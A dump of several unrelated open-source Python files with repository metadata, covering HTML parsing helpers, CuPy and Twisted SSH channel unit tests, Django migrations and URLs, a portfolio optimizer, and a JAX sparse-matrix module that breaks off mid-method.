suite = unittest.TestLoader().loadTestsFromTestCase(test_sockselect)
unittest.TextTestRunner(sys.stdout, verbosity=1).run(suite)
| {
"content_hash": "2d271407b004d9b651240f96ea2bded0",
"timestamp": "",
"source": "github",
"line_count": 223,
"max_line_length": 78,
"avg_line_length": 37.34080717488789,
"alnum_prop": 0.5240782995076257,
"repo_name": "Dannnno/PyIRC",
"id": "3e100680aa8df065ac9cf8e71cf5dfcdff642656",
"size": "8327",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Testing/test_sockselect.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34282"
}
],
"symlink_target": ""
} |
from decimal import Decimal, InvalidOperation
from datetime import datetime
import iso8601
def string(els):
if isinstance(els, basestring):
return els.strip()
return ''.join(el.text_content().strip() for el in els)
def integer_single(s):
s = s.strip().replace(',', '')
return int(s)
def integer(els):
s = string(els)
for chunk in s.split():
try:
return integer_single(chunk)
except ValueError:
pass
raise ValueError("couldn't find an integer in: %r" % s)
def calendar_date(els):
s = string(els)
return datetime.strptime(s, '%b %d, %Y')
def isodate(els):
s = string(els)
return iso8601.parse_date(s)
def currency_single(s):
s = s.strip()
if s.startswith('$'):
units = 'usd'
s = s[1:]
elif s.startswith(u'\xa3'):
units = 'gbp'
s = s[1:]
else:
raise ValueError("doesn't start with a currency symbol")
s = s.replace(',', '')
try:
return units, Decimal(s)
except InvalidOperation:
raise ValueError("couldn't convert to currency")
def currency(els):
s = string(els)
for chunk in s.split():
try:
return currency_single(chunk)
except ValueError:
pass
raise ValueError("couldn't find a currency in: %r" % s)
def href(els):
if len(els) != 1:
raise ValueError("got wrong # of elements for href: %r" % els)
el = els[0]
return el.attrib['href']
def hrefs(els):
return [el.attrib['href'] for el in els]
| {
"content_hash": "1399a5abafcc4ead9043c5cd9e2054e6",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 70,
"avg_line_length": 21.36986301369863,
"alnum_prop": 0.5814102564102565,
"repo_name": "storborg/itsy",
"id": "ae9dd2eb730cf59fa260e4be74ad02f666da4336",
"size": "1560",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "itsy/parsers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19659"
}
],
"symlink_target": ""
} |
import unittest
from cupy import testing
@testing.gpu
class TestElementwise(unittest.TestCase):
@testing.for_int_dtypes()
@testing.numpy_cupy_array_equal()
def check_unary_int(self, name, xp, dtype):
a = xp.array([-3, -2, -1, 0, 1, 2, 3], dtype=dtype)
return getattr(xp, name)(a)
@testing.for_int_dtypes()
@testing.numpy_cupy_array_equal()
def check_binary_int(self, name, xp, dtype):
a = xp.array([-3, -2, -1, 0, 1, 2, 3], dtype=dtype)
b = xp.array([0, 1, 2, 3, 4, 5, 6], dtype=dtype)
return getattr(xp, name)(a, b)
def test_bitwise_and(self):
self.check_binary_int('bitwise_and')
def test_bitwise_or(self):
self.check_binary_int('bitwise_or')
def test_bitwise_xor(self):
self.check_binary_int('bitwise_xor')
def test_invert(self):
self.check_unary_int('invert')
def test_left_shift(self):
self.check_binary_int('left_shift')
def test_right_shift(self):
self.check_binary_int('right_shift')
| {
"content_hash": "ece0e737db44ecacef958c5ed3a4c95a",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 59,
"avg_line_length": 27.342105263157894,
"alnum_prop": 0.6073147256977863,
"repo_name": "cupy/cupy",
"id": "eca12f948b75ed6f5188113081037743abcf173b",
"size": "1039",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/cupy_tests/binary_tests/test_elementwise.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "38"
},
{
"name": "C",
"bytes": "712019"
},
{
"name": "C++",
"bytes": "895316"
},
{
"name": "Cuda",
"bytes": "151799"
},
{
"name": "Cython",
"bytes": "1996454"
},
{
"name": "Dockerfile",
"bytes": "40251"
},
{
"name": "PowerShell",
"bytes": "7361"
},
{
"name": "Python",
"bytes": "4841354"
},
{
"name": "Shell",
"bytes": "24521"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('djangocms_googlecalendar', '0002_googlecalendar_title'),
]
operations = [
migrations.AlterField(
model_name='googlecalendar',
name='cmsplugin_ptr',
field=models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_googlecalendar_googlecalendar', serialize=False, to='cms.CMSPlugin'),
),
migrations.AlterField(
model_name='googlecalendar',
name='colour',
field=models.CharField(blank=True, help_text='Colour in hex format: rrggbb', max_length=6),
),
]
| {
"content_hash": "92aa3f7295d77c5a66109eb52fce2ea5",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 232,
"avg_line_length": 35.041666666666664,
"alnum_prop": 0.6611177170035671,
"repo_name": "c4sc/arividam",
"id": "af1388afcddfc22326fe6f7f00c987a66ed7c191",
"size": "913",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "arividam/contrib/djangocms_googlecalendar/migrations/0003_auto_20160810_2005.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "10607"
},
{
"name": "HTML",
"bytes": "49340"
},
{
"name": "JavaScript",
"bytes": "3142"
},
{
"name": "Python",
"bytes": "84703"
},
{
"name": "Shell",
"bytes": "7248"
}
],
"symlink_target": ""
} |
import numpy as np
import scipy.optimize as spo
def get_portfolio_value(prices, allocs, start_val=1):
"""
Compute the daily value of the portfolio with the given prices and initial allocations.
Parameters
----------
prices: DataFrame
the prices of the stocks
allocs: list
the allocations of the stocks
start_val: float
the start value of the portfolio
Returns
----------
portval: DataFrame
the daily value of the portfolio.
"""
normalized_prices = prices/prices.iloc[0] # all values divide the first row
allocated = normalized_prices * allocs * start_val # calculate the allocations and values after the first day
return allocated.sum(axis=1)
def get_portfolio_stats(port_val, daily_rf=0, samples_per_year=252):
"""
Calculate statistics on given portfolio values.
Parameters
----------
port_val: Series
the daily portfolio value
daily_rf: float
daily risk-free rate of return
samples_per_year: int
frequency of sampling
Returns
----------
cum_ret: float
cumulative return
avg_daily_ret: float
average daily return
std_daily_ret: float
the standand deviation of daily return
sharpe_ratio: float
the sharpe ratio
"""
cum_ret = port_val[-1]/port_val[0] - 1
daily_ret = port_val/port_val.shift(1) - 1
avg_daily_ret = daily_ret.sum()/(len(daily_ret) - 1)
std_daily_ret = daily_ret[1:].std()
sharpe_ratio = np.sqrt(samples_per_year) * (avg_daily_ret - daily_rf)/std_daily_ret
return cum_ret, avg_daily_ret, std_daily_ret, sharpe_ratio
def __objective_fun_max_sharpe_ratio(allocs, prices):
"""
The objective function that return max sharpe ratio.
Parameters
----------
allocs: list
allocations of stocks
prices: DataFrame
prices of stocks
Returns
----------
val: float
negative sharpe_ratio
"""
port_val = get_portfolio_value(prices, allocs, 1)
cum_ret, avg_daily_ret, std_daily_ret, sharpe_ratio = get_portfolio_stats(port_val)
return sharpe_ratio * -1
def find_optimal_allocations(prices):
"""
Find the optimal allocations for the portfolio, optimize sharpe ratio.
Parameters
----------
prices: DataFrame
the prices of stocks
Returns
----------
alloc: list
the allocation of the stocks
"""
length = len(prices.columns)
initial_allocs = np.empty(length)
initial_allocs.fill(1.0/length)
# create bounds
bnds = []
for i in range(length):
bnds.append((0, 1))
bnds = tuple(bnds)
min_result = spo.minimize(
__objective_fun_max_sharpe_ratio, # objective function
initial_allocs, # guess value
args = (prices,), # extra args passed to the objective fun
method='SLSQP', # optimize algorithm to use
# equality (type='eq') constraint, where you make a function that must equal zero
constraints = ({ 'type': 'eq', 'fun': lambda x: 1 - np.sum(x) }),
bounds = bnds, # the bounds of x
options={'disp':True} # display converge message
)
return min_result.x | {
"content_hash": "15e701ef6edcb859eed662ae10d9de7c",
"timestamp": "",
"source": "github",
"line_count": 120,
"max_line_length": 113,
"avg_line_length": 27.441666666666666,
"alnum_prop": 0.6085636197995749,
"repo_name": "hchim/stockanalyzer",
"id": "0eaa6c35bbabb0b2f01607ec85991310c74e0409",
"size": "3293",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "analysis/portfolio.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "127452"
}
],
"symlink_target": ""
} |
"""
Test ssh/channel.py.
"""
from twisted.conch.ssh import channel
from twisted.trial import unittest
class MockTransport(object):
"""
A mock Transport. All we use is the getPeer() and getHost() methods.
Channels implement the ITransport interface, and their getPeer() and
getHost() methods return ('SSH', <transport's getPeer/Host value>) so
we need to implement these methods so they have something to draw
from.
"""
def getPeer(self):
return ('MockPeer',)
def getHost(self):
return ('MockHost',)
class MockConnection(object):
"""
A mock for twisted.conch.ssh.connection.SSHConnection. Record the data
that channels send, and when they try to close the connection.
@ivar data: a C{dict} mapping channel id #s to lists of data sent by that
channel.
@ivar extData: a C{dict} mapping channel id #s to lists of 2-tuples
(extended data type, data) sent by that channel.
@ivar closes: a C{dict} mapping channel id #s to True if that channel sent
a close message.
"""
transport = MockTransport()
def __init__(self):
self.data = {}
self.extData = {}
self.closes = {}
def logPrefix(self):
"""
Return our logging prefix.
"""
return "MockConnection"
def sendData(self, channel, data):
"""
Record the sent data.
"""
self.data.setdefault(channel, []).append(data)
def sendExtendedData(self, channel, type, data):
"""
Record the sent extended data.
"""
self.extData.setdefault(channel, []).append((type, data))
def sendClose(self, channel):
"""
Record that the channel sent a close message.
"""
self.closes[channel] = True
class ChannelTests(unittest.TestCase):
def setUp(self):
"""
Initialize the channel. remoteMaxPacket is 10 so that data is able
to be sent (the default of 0 means no data is sent because no packets
are made).
"""
self.conn = MockConnection()
self.channel = channel.SSHChannel(conn=self.conn,
remoteMaxPacket=10)
self.channel.name = 'channel'
def test_init(self):
"""
Test that SSHChannel initializes correctly. localWindowSize defaults
to 131072 (2**17) and localMaxPacket to 32768 (2**15) as reasonable
defaults (what OpenSSH uses for those variables).
The values in the second set of assertions are meaningless; they serve
only to verify that the instance variables are assigned in the correct
order.
"""
c = channel.SSHChannel(conn=self.conn)
self.assertEqual(c.localWindowSize, 131072)
self.assertEqual(c.localWindowLeft, 131072)
self.assertEqual(c.localMaxPacket, 32768)
self.assertEqual(c.remoteWindowLeft, 0)
self.assertEqual(c.remoteMaxPacket, 0)
self.assertEqual(c.conn, self.conn)
self.assertEqual(c.data, None)
self.assertEqual(c.avatar, None)
c2 = channel.SSHChannel(1, 2, 3, 4, 5, 6, 7)
self.assertEqual(c2.localWindowSize, 1)
self.assertEqual(c2.localWindowLeft, 1)
self.assertEqual(c2.localMaxPacket, 2)
self.assertEqual(c2.remoteWindowLeft, 3)
self.assertEqual(c2.remoteMaxPacket, 4)
self.assertEqual(c2.conn, 5)
self.assertEqual(c2.data, 6)
self.assertEqual(c2.avatar, 7)
def test_str(self):
"""
Test that str(SSHChannel) works gives the channel name and local and
remote windows at a glance..
"""
self.assertEqual(str(self.channel), '<SSHChannel channel (lw 131072 '
'rw 0)>')
def test_logPrefix(self):
"""
Test that SSHChannel.logPrefix gives the name of the channel, the
local channel ID and the underlying connection.
"""
self.assertEqual(self.channel.logPrefix(), 'SSHChannel channel '
'(unknown) on MockConnection')
def test_addWindowBytes(self):
"""
Test that addWindowBytes adds bytes to the window and resumes writing
if it was paused.
"""
cb = [False]
def stubStartWriting():
cb[0] = True
self.channel.startWriting = stubStartWriting
self.channel.write('test')
self.channel.writeExtended(1, 'test')
self.channel.addWindowBytes(50)
self.assertEqual(self.channel.remoteWindowLeft, 50 - 4 - 4)
self.assertTrue(self.channel.areWriting)
self.assertTrue(cb[0])
self.assertEqual(self.channel.buf, '')
self.assertEqual(self.conn.data[self.channel], ['test'])
self.assertEqual(self.channel.extBuf, [])
self.assertEqual(self.conn.extData[self.channel], [(1, 'test')])
cb[0] = False
self.channel.addWindowBytes(20)
self.assertFalse(cb[0])
self.channel.write('a'*80)
self.channel.loseConnection()
self.channel.addWindowBytes(20)
self.assertFalse(cb[0])
def test_requestReceived(self):
"""
Test that requestReceived handles requests by dispatching them to
request_* methods.
"""
self.channel.request_test_method = lambda data: data == ''
self.assertTrue(self.channel.requestReceived('test-method', ''))
self.assertFalse(self.channel.requestReceived('test-method', 'a'))
self.assertFalse(self.channel.requestReceived('bad-method', ''))
def test_closeReceieved(self):
"""
Test that the default closeReceieved closes the connection.
"""
self.assertFalse(self.channel.closing)
self.channel.closeReceived()
self.assertTrue(self.channel.closing)
def test_write(self):
"""
Test that write handles data correctly. Send data up to the size
of the remote window, splitting the data into packets of length
remoteMaxPacket.
"""
cb = [False]
def stubStopWriting():
cb[0] = True
# no window to start with
self.channel.stopWriting = stubStopWriting
self.channel.write('d')
self.channel.write('a')
self.assertFalse(self.channel.areWriting)
self.assertTrue(cb[0])
# regular write
self.channel.addWindowBytes(20)
self.channel.write('ta')
data = self.conn.data[self.channel]
self.assertEqual(data, ['da', 'ta'])
self.assertEqual(self.channel.remoteWindowLeft, 16)
# larger than max packet
self.channel.write('12345678901')
self.assertEqual(data, ['da', 'ta', '1234567890', '1'])
self.assertEqual(self.channel.remoteWindowLeft, 5)
# running out of window
cb[0] = False
self.channel.write('123456')
self.assertFalse(self.channel.areWriting)
self.assertTrue(cb[0])
self.assertEqual(data, ['da', 'ta', '1234567890', '1', '12345'])
self.assertEqual(self.channel.buf, '6')
self.assertEqual(self.channel.remoteWindowLeft, 0)
def test_writeExtended(self):
"""
Test that writeExtended handles data correctly. Send extended data
up to the size of the window, splitting the extended data into packets
of length remoteMaxPacket.
"""
cb = [False]
def stubStopWriting():
cb[0] = True
# no window to start with
self.channel.stopWriting = stubStopWriting
self.channel.writeExtended(1, 'd')
self.channel.writeExtended(1, 'a')
self.channel.writeExtended(2, 't')
self.assertFalse(self.channel.areWriting)
self.assertTrue(cb[0])
# regular write
self.channel.addWindowBytes(20)
self.channel.writeExtended(2, 'a')
data = self.conn.extData[self.channel]
self.assertEqual(data, [(1, 'da'), (2, 't'), (2, 'a')])
self.assertEqual(self.channel.remoteWindowLeft, 16)
# larger than max packet
self.channel.writeExtended(3, '12345678901')
self.assertEqual(data, [(1, 'da'), (2, 't'), (2, 'a'),
(3, '1234567890'), (3, '1')])
self.assertEqual(self.channel.remoteWindowLeft, 5)
# running out of window
cb[0] = False
self.channel.writeExtended(4, '123456')
self.assertFalse(self.channel.areWriting)
self.assertTrue(cb[0])
self.assertEqual(data, [(1, 'da'), (2, 't'), (2, 'a'),
(3, '1234567890'), (3, '1'), (4, '12345')])
self.assertEqual(self.channel.extBuf, [[4, '6']])
self.assertEqual(self.channel.remoteWindowLeft, 0)
def test_writeSequence(self):
"""
Test that writeSequence is equivalent to write(''.join(sequece)).
"""
self.channel.addWindowBytes(20)
self.channel.writeSequence(map(str, range(10)))
self.assertEqual(self.conn.data[self.channel], ['0123456789'])
def test_loseConnection(self):
"""
Tesyt that loseConnection() doesn't close the channel until all
the data is sent.
"""
self.channel.write('data')
self.channel.writeExtended(1, 'datadata')
self.channel.loseConnection()
self.assertEqual(self.conn.closes.get(self.channel), None)
self.channel.addWindowBytes(4) # send regular data
self.assertEqual(self.conn.closes.get(self.channel), None)
self.channel.addWindowBytes(8) # send extended data
self.assertTrue(self.conn.closes.get(self.channel))
def test_getPeer(self):
"""
Test that getPeer() returns ('SSH', <connection transport peer>).
"""
self.assertEqual(self.channel.getPeer(), ('SSH', 'MockPeer'))
def test_getHost(self):
"""
Test that getHost() returns ('SSH', <connection transport host>).
"""
self.assertEqual(self.channel.getHost(), ('SSH', 'MockHost'))
| {
"content_hash": "b1c7ae8390ccb6d549d84ca60baf35fa",
"timestamp": "",
"source": "github",
"line_count": 276,
"max_line_length": 78,
"avg_line_length": 36.221014492753625,
"alnum_prop": 0.6135840752225667,
"repo_name": "bdh1011/wau",
"id": "dcb63570f1075e3c75bee58ffdf44b8864a7d951",
"size": "10078",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "venv/lib/python2.7/site-packages/twisted/conch/test/test_channel.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1176"
},
{
"name": "C",
"bytes": "5022853"
},
{
"name": "C++",
"bytes": "43676"
},
{
"name": "CSS",
"bytes": "10359"
},
{
"name": "D",
"bytes": "1841"
},
{
"name": "FORTRAN",
"bytes": "3707"
},
{
"name": "GAP",
"bytes": "14120"
},
{
"name": "Groff",
"bytes": "7236"
},
{
"name": "HTML",
"bytes": "1709320"
},
{
"name": "JavaScript",
"bytes": "1200059"
},
{
"name": "Jupyter Notebook",
"bytes": "310219"
},
{
"name": "Lua",
"bytes": "11887"
},
{
"name": "Makefile",
"bytes": "112163"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Objective-C",
"bytes": "1291"
},
{
"name": "Perl",
"bytes": "171375"
},
{
"name": "Python",
"bytes": "49407229"
},
{
"name": "Ruby",
"bytes": "58403"
},
{
"name": "Shell",
"bytes": "47672"
},
{
"name": "Smarty",
"bytes": "22599"
},
{
"name": "Tcl",
"bytes": "426334"
},
{
"name": "XSLT",
"bytes": "153073"
}
],
"symlink_target": ""
} |
""" urls.py for flatpagewiki app
"""
from django.conf.urls.defaults import *
urlpatterns = patterns('flatpagewiki.views',
(r'^(?P<slug>[^/]+)/$', 'showpage'),
) | {
"content_hash": "25f585c6a9ee80098b8e9323f890ee09",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 44,
"avg_line_length": 15.727272727272727,
"alnum_prop": 0.6127167630057804,
"repo_name": "snowcloud/django-flatpagewiki",
"id": "2a82f5e4c1b606fae0fa42fc6259dec86e722a57",
"size": "173",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "flatpagewiki/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "6535"
}
],
"symlink_target": ""
} |
"""BCSR (Bached compressed row) matrix object and associated primitives."""
import operator
from typing import NamedTuple, Sequence, Tuple
import numpy as np
from jax import core
from jax.experimental.sparse._base import JAXSparse
from jax.experimental.sparse import bcoo
from jax.experimental.sparse.util import _broadcasting_vmap, _count_stored_elements, _csr_to_coo, _safe_asarray
import jax.numpy as jnp
from jax.util import split_list, safe_zip
from jax.interpreters import batching
from jax.interpreters import mlir
Shape = Tuple[int, ...]
class BCSRProperties(NamedTuple):
n_batch: int
n_dense: int
nse: int
def _compatible(shape1, shape2):
return all(s1 in (1, s2) for s1, s2 in safe_zip(shape1, shape2))
def _validate_bcsr_indices(indices: jnp.ndarray, indptr: jnp.ndarray,
shape: Sequence[int]) -> BCSRProperties:
assert jnp.issubdtype(indices.dtype, jnp.integer)
assert jnp.issubdtype(indptr.dtype, jnp.integer)
shape = tuple(shape)
nse = indices.shape[-1]
n_batch = indices.ndim - 1
n_dense = len(shape) - n_batch - 2
assert n_dense >= 0
if not _compatible(indices.shape[:n_batch], shape[:n_batch]):
raise ValueError("indices batch dimensions not compatible for "
f"indices.shape={indices.shape}, shape={shape}")
if not _compatible(indptr.shape[:n_batch], shape[:n_batch]):
raise ValueError("indptr batch dimensions not compatible for "
f"indptr.shape={indptr.shape}, shape={shape}")
if indptr.shape[n_batch:] != (shape[n_batch] + 1,):
raise ValueError("indptr shape must match the matrix shape plus 1.")
return BCSRProperties(n_batch=n_batch, n_dense=n_dense, nse=nse)
def _validate_bcsr(data: jnp.ndarray, indices: jnp.ndarray,
indptr: jnp.ndarray, shape: Sequence[int]) -> BCSRProperties:
props = _validate_bcsr_indices(indices, indptr, shape)
shape = tuple(shape)
n_batch, n_dense, nse = props.n_batch, props.n_dense, props.nse
n_sparse = len(shape) - n_batch - n_dense
if n_sparse != 2:
raise ValueError("BCSR array must have 2 sparse dimensions; "
f"{n_sparse} is given.")
if not _compatible(data.shape[:n_batch], shape[:n_batch]):
raise ValueError("data batch dimensions not compatible for "
f"data.shape={data.shape}, shape={shape}")
if data.shape[-(n_dense + 1):] != (nse,) + shape[n_batch + 2:]:
raise ValueError(f"Invalid data.shape={data.shape} for "
f"nse={nse}, n_batch={n_batch}, n_dense={n_dense}")
return props
def _bcsr_to_bcoo(indices: jnp.ndarray, indptr: jnp.ndarray, *,
shape: Sequence[int]) -> jnp.ndarray:
"""Given BCSR (indices, indptr), return BCOO (indices)."""
n_batch, _, _ = _validate_bcsr_indices(indices, indptr, shape)
csr_to_coo = _csr_to_coo
for _ in range(n_batch):
csr_to_coo = _broadcasting_vmap(csr_to_coo)
return jnp.stack(csr_to_coo(indices, indptr), axis=indices.ndim)
#--------------------------------------------------------------------
# bcsr_fromdense
bcsr_fromdense_p = core.Primitive('bcsr_fromdense')
bcsr_fromdense_p.multiple_results = True
_TRACED_NSE_ERROR = """
The error arose for the nse argument of bcsr_fromdense. In order for
BCSR.fromdense() to be used in traced/compiled code, you must pass a concrete
value to the nse (number of stored elements) argument.
"""
def bcsr_fromdense(mat, *, nse=None, n_batch=0, n_dense=0, index_dtype=jnp.int32):
"""Create BCSR-format sparse matrix from a dense matrix.
Args:
mat : array to be converted to BCOO.
nse : number of stored elements in each batch
n_batch : number of batch dimensions (default: 0)
n_dense : number of dense dimensions (default: 0)
index_dtype : dtype of sparse indices (default: int32)
Returns:
mat_bcsr: BCSR representation of the matrix.
"""
mat = jnp.asarray(mat)
if nse is None:
nse = _count_stored_elements(mat, n_batch, n_dense)
nse = core.concrete_or_error(operator.index, nse, _TRACED_NSE_ERROR)
return BCSR(_bcsr_fromdense(mat, nse=nse, n_batch=n_batch, n_dense=n_dense,
index_dtype=index_dtype),
shape=mat.shape)
def _bcsr_fromdense(mat, *, nse, n_batch=0, n_dense=0, index_dtype=jnp.int32):
"""Create BCSR-format sparse matrix from a dense matrix.
Args:
mat : array to be converted to BCSR, with
``ndim = n_batch + n_sparse + n_dense``.
nse : number of stored elements in each batch.
n_batch : number of batch dimensions (default: 0)
n_dense : number of dense dimensions (default: 0)
index_dtype : dtype of sparse indices (default: int32)
Returns:
data : array of shape
``mat.shape[:n_batch] + (nse,) + mat.shape[mat.ndim - n_dense:]``
and dtype ``mat.dtype``
indices : array of shape ``mat.shape[:n_batch] + (nse,)`` and dtype of
``index_type``.
indptr: array of shape ``mat.shape[:n_batch] + (mat.shape[n_batch] + 1,)``
and dtype of ``index_type``.
"""
mat = jnp.asarray(mat)
nse = core.concrete_or_error(operator.index, nse, _TRACED_NSE_ERROR)
return bcsr_fromdense_p.bind(mat, nse=nse, n_batch=n_batch, n_dense=n_dense,
index_dtype=index_dtype)
@bcsr_fromdense_p.def_impl
def _bcsr_fromdense_impl(mat, *, nse, n_batch, n_dense, index_dtype):
mat = jnp.asarray(mat)
n_sparse = mat.ndim - n_dense - n_batch
if n_sparse != 2:
raise ValueError("bcsr_fromdense: must have 2 sparse dimensions.")
bcoo_mat = bcoo.bcoo_fromdense(mat, nse=nse, index_dtype=index_dtype,
n_dense=n_dense, n_batch=n_batch)
indices, indptr = bcoo._bcoo_to_bcsr(bcoo_mat.indices, shape=mat.shape)
return bcoo_mat.data, indices, indptr
@bcsr_fromdense_p.def_abstract_eval
def _bcoo_fromdense_abstract_eval(mat, *, nse, n_batch, n_dense, index_dtype):
n_sparse = mat.ndim - n_batch - n_dense
if n_sparse != 2:
raise ValueError("bcsr_fromdense: must have 2 sparse dimensions.")
data_shape = mat.shape[:n_batch] + (nse,) + mat.shape[n_batch + n_sparse:]
index_shape = mat.shape[:n_batch] + (nse,)
indptr_shape = mat.shape[:n_batch] + (mat.shape[n_batch] + 1,)
return (core.ShapedArray(data_shape, mat.dtype),
core.ShapedArray(index_shape, index_dtype),
core.ShapedArray(indptr_shape, index_dtype))
def _bcsr_fromdense_batching_rule(batched_args, batch_dims, *, nse, n_batch,
n_dense, index_dtype):
M, = batched_args
if batch_dims != (0,):
raise NotImplementedError(f"batch_dims={batch_dims}")
new_n_batch = n_batch + 1
n_sparse = M.ndim - n_dense - new_n_batch
if n_sparse != 2:
raise ValueError("_bcsr_fromdense_batching_rule: must have 2 sparse "
f"dimensions but {n_sparse} is given.")
return _bcsr_fromdense(M, nse=nse, n_batch=new_n_batch, n_dense=n_dense,
index_dtype=index_dtype), (0, 0, 0)
batching.primitive_batchers[bcsr_fromdense_p] = _bcsr_fromdense_batching_rule
mlir.register_lowering(bcsr_fromdense_p, mlir.lower_fun(
_bcsr_fromdense_impl, multiple_results=True))
#----------------------------------------------------------------------
# bcsr_todense
bcsr_todense_p = core.Primitive('bcsr_todense')
def bcsr_todense(mat):
"""Convert batched sparse matrix to a dense matrix.
Args:
mat: BCSR matrix.
Returns:
The dense version of ``mat``.
"""
return _bcsr_todense(mat.data, mat.indices, mat.indptr,
shape=tuple(mat.shape))
def _bcsr_todense(data, indices, indptr, *, shape):
"""Convert batched sparse matrix to a dense matrix.
Args:
data : array of shape ``batch_dims + (nse,) + dense_dims``.
indices : array of shape ``batch_dims + (nse,)``.
indptr : array of shape ``batch_dims + (shape[len(batch_dims)] + 1,).
shape : tuple; the shape of the (batched) matrix. Equal to
``batch_dims + 2(sparse_dims) + dense_dims``
Returns:
mat : array with specified shape and dtype matching ``data``
"""
return bcsr_todense_p.bind(jnp.asarray(data), jnp.asarray(indices),
jnp.asarray(indptr), shape=shape)
@bcsr_todense_p.def_impl
def _bcsr_todense_impl(data, indices, indptr, *, shape):
bcoo_indices = _bcsr_to_bcoo(indices, indptr, shape=shape)
return (bcoo.BCOO((data, bcoo_indices), shape=shape)).todense()
@bcsr_todense_p.def_abstract_eval
def _bcsr_todense_abstract_eval(data, indices, indptr, *, shape):
_validate_bcsr(data, indices, indptr, shape)
return core.ShapedArray(shape, data.dtype)
def _bcsr_todense_batching_rule(batched_args, batch_dims, *, shape):
data, indices, indptr = batched_args
if any(b not in [0, None] for b in batch_dims):
raise NotImplementedError(f"batch_dims={batch_dims}. "
"Only 0 and None are supported.")
if batch_dims[0] is None:
data = data[None, ...]
if batch_dims[1] is None:
indices = indices[None, ...]
if batch_dims[2] is None:
indptr = indptr[None, ...]
return _bcsr_todense(data, indices, indptr, shape=shape), 0
batching.primitive_batchers[bcsr_todense_p] = _bcsr_todense_batching_rule
mlir.register_lowering(bcsr_todense_p, mlir.lower_fun(
_bcsr_todense_impl, multiple_results=False))
#--------------------------------------------------------------------
# bcsr_extract
bcsr_extract_p = core.Primitive('bcsr_extract')
def bcsr_extract(indices, indptr, mat):
"""Extract values from a dense matrix at given BCSR (indices, indptr).
Args:
indices: An ndarray; see BCSR indices.
indptr: An ndarray; see BCSR indptr.
mat: A dense matrix.
Returns:
An ndarray; see BCSR data.
"""
return bcsr_extract_p.bind(indices, indptr, mat)
@bcsr_extract_p.def_impl
def _bcsr_extract_impl(indices, indptr, mat):
mat = jnp.asarray(mat)
bcoo_indices = _bcsr_to_bcoo(indices, indptr, shape=mat.shape)
return bcoo.bcoo_extract(bcoo_indices, mat)
@bcsr_extract_p.def_abstract_eval
def _bcsr_extract_abstract_eval(indices, indptr, mat):
n_batch, n_dense, nse = _validate_bcsr_indices(indices, indptr, mat.shape)
out_shape = mat.shape[:n_batch] + (nse,) + mat.shape[mat.ndim - n_dense:]
return core.ShapedArray(out_shape, mat.dtype)
mlir.register_lowering(bcsr_extract_p, mlir.lower_fun(
_bcsr_extract_impl, multiple_results=False))
class BCSR(JAXSparse):
"""Experimental batched CSR matrix implemented in JAX."""
data: jnp.ndarray
indices: jnp.ndarray
indptr: jnp.ndarray
shape: Shape
nse = property(lambda self: self.indices.shape[-1])
dtype = property(lambda self: self.data.dtype)
n_batch = property(lambda self: self.indices.ndim - 1)
n_sparse = property(lambda _: 2)
n_dense = property(lambda self: self.data.ndim - self.indices.ndim)
@property
def _sparse_shape(self):
return tuple(self.shape[self.n_batch:self.n_batch + 2])
def __init__(self, args, *, shape):
# JAX transforms will sometimes instantiate pytrees with null values, so we
# must catch that in the initialization of inputs.
self.data, self.indices, self.indptr = _safe_asarray(args)
super().__init__(args, shape=shape)
def __repr__(self):
name = self.__class__.__name__
try:
nse = self.nse
n_batch = self.n_batch
n_dense = self.n_dense
dtype = self.dtype
shape = list(self.shape)
except Exception: # pylint: disable=broad-except
repr_ = f"{name}(<invalid>)"
else:
extra = f", nse={nse}"
if n_batch: extra += f", n_batch={n_batch}"
if n_dense: extra += f", n_dense={n_dense}"
repr_ = f"{name}({dtype}{shape}{extra})"
if isinstance(self.data, core.Tracer):
repr_ = f"{type(self.data).__name__}[{repr_}]"
return repr_
def transpose(self, *args, **kwargs):
raise NotImplementedError("Tranpose is not implemented.")
def tree_flatten(self):
return (self.data, self.indices, self.indptr), {}
@classmethod
def _empty(cls, shape, *, dtype=None, index_dtype='int32', n_dense=0,
n_batch=0, nse=0):
"""Create an empty BCSR instance. Public method is sparse.empty()."""
shape = tuple(shape)
if n_dense < 0 or n_batch < 0 or nse < 0:
raise ValueError(f"Invalid inputs: shape={shape}, n_dense={n_dense},"
f"n_batch={n_batch}, nse={nse}")
n_sparse = len(shape) - n_dense - n_batch
if n_sparse != 2:
raise ValueError("BCSR sparse.empty: must have 2 sparse dimensions.")
batch_shape, sparse_shape, dense_shape = split_list(shape,
[n_batch, n_sparse])
data = jnp.zeros((*batch_shape, nse, *dense_shape), dtype)
indices = jnp.full((*batch_shape, nse), jnp.array(sparse_shape[1]),
index_dtype)
indptr = jnp.zeros((*batch_shape, sparse_shape[0] + 1), index_dtype)
return cls((data, indices, indptr), shape=shape)
@classmethod
def fromdense(cls, mat, *, nse=None, index_dtype=np.int32, n_dense=0,
n_batch=0):
"""Create a BCSR array from a (dense) :class:`DeviceArray`."""
return bcsr_fromdense(mat, nse=nse, index_dtype=index_dtype,
n_dense=n_dense, n_batch=n_batch)
def todense(self):
"""Create a dense version of the array."""
